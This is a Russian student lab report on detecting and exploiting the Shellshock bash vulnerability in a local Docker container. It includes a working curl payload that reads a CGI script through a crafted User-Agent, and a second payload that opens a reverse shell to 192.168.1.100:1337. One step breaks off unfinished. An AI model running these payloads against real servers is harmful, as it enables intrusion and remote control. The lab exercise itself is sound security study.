# Модуль 2. Сканирование на уязвимости. Сетевые сканирования ## Практическое задание №2 ### Задание №1. Детектирование Shellshock с помощью Nmap 1. Скачаем [репозиторий](https://github.com/Zenithar/docker-shellshockable) и соберем Docker-контейнер ![alt text](image.png) 2. Запустим контейнер командой `docker run -d -p 80:80 --name shellshock marker689/shellshockable` 3. Посмотрим вывод CGI-скрипта. ``` curl http://localhost/cgi-bin/shockme.cgi ``` ![alt text](image-1.png) Вывод соответствует коду в CGI-скрипте: ```bash #!/usr/local/bin/bash echo "Content-type: text/html" echo "" echo "https://shellshocker.net/" ``` 4. Выполним эксплуатацию уязвимости Shellshock `curl -A "() { test;};echo \"Content-type: text/plain\"; echo; echo; /bin/cat /usr/lib/cgi-bin/shockme.cgi" http://localhost/cgi-bin/shockme.cgi` ![alt text](image-2.png) ```bash #!/usr/local/bin/bash echo "Content-type: text/html" echo "" echo "https://shellshocker.net/" ``` Мы раскрыли содержимое скрипта, также можно сделать ревер-шелл. 5. `curl -H "user-agent: () { :; }; echo; echo; /bin/bash -c 'sh -i >& /dev/tcp/192.168.1.100/1337 0>&1'" http://localhost/cgi-bin/shockme.cgi` ![alt text](image-3.png) 6. Приступим к написанию # Итог лабораторной работы На этом лабораторная работа окончена, файл отчет в формате pdf во вложении. Выполнил: Харитонов Марат Русланович, студенческий билет №М235314.